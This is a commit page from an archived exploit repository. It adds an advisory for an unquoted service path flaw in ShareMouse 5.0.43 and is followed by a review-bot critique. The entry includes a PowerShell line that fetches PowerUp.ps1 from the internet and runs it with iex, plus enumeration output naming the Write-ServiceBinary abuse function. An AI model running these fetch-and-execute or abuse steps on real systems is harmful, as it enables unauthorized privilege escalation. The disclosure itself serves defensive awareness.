This repository has been archived by the owner on Nov 28, 2022. It is now read-only.
1 changes to exploits/shellcodes ShareMouse 5.0.43 - 'ShareMouse Service' Unquoted Service Path
Offensive Security committed Sep 9, 2020
1 parent f288c52, commit 39b0da4
Showing 2 changed files with 26 additions and 0 deletions.
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,25 @@ | ||
# Exploit Title: ShareMouse 5.0.43 - 'ShareMouse Service' Unquoted Service Path | ||
# Discovery Date: 2020-09-08 | ||
# Discovery by: Alan Lacerda (alacerda) | ||
# Vendor Homepage: https://www.sharemouse.com/ | ||
# Software Link: https://www.sharemouse.com/ShareMouseSetup.exe | ||
# Version: 5.0.43 | ||
# Tested on OS: Microsoft Windows 10 Pro EN OS Version: 10.0.19041 | ||
|
||
PS > iex (iwr https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1 -UseBasicParsing); | ||
PS > Invoke-AllChecks | ||
|
||
ServiceName : ShareMouse Service | ||
Path : C:\Program Files (x86)\ShareMouse\smService.exe | ||
StartName : LocalSystem | ||
AbuseFunction : Write-ServiceBinary -ServiceName 'ShareMouse Service' -Path <HijackPath> | ||
|
||
PS > wmic service where 'name like "%ShareMouse%"' get DisplayName,PathName,AcceptStop,StartName | ||
AcceptStop DisplayName PathName StartName | ||
TRUE ShareMouse Service C:\Program Files (x86)\ShareMouse\smService.exe LocalSystem | ||
|
||
#Exploit: | ||
# A successful attempt would require the local user to be able to insert their code in the system root path | ||
# undetected by the OS or other security applications where it could potentially be executed during | ||
# application startup or reboot. If successful, the local user's code would execute with the elevated | ||
# privileges of the application. |
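Review bot: The "#Exploit:" paragraph rests on the local user being able to write to the system root path, but nothing in the recorded output shows that this holds. The PowerUp and wmic results establish only that the PathName of 'ShareMouse Service' is unquoted, contains spaces, and starts as LocalSystem. Please add the ACLs for the locations Windows would try before smService.exe (for example icacls output for C:\) so a reader can tell whether a non-administrative account can meet that precondition on the tested build, since that decides how serious the finding is. It would also help to state the remediation next to the finding: the service's image path should be wrapped in double quotes so the service manager does not split it at the spaces. Lesser point: the first command pipes a script fetched from a branch URL straight into iex, so the check is not reproducible; reference a fixed revision of PowerUp.ps1 or name the version that was used.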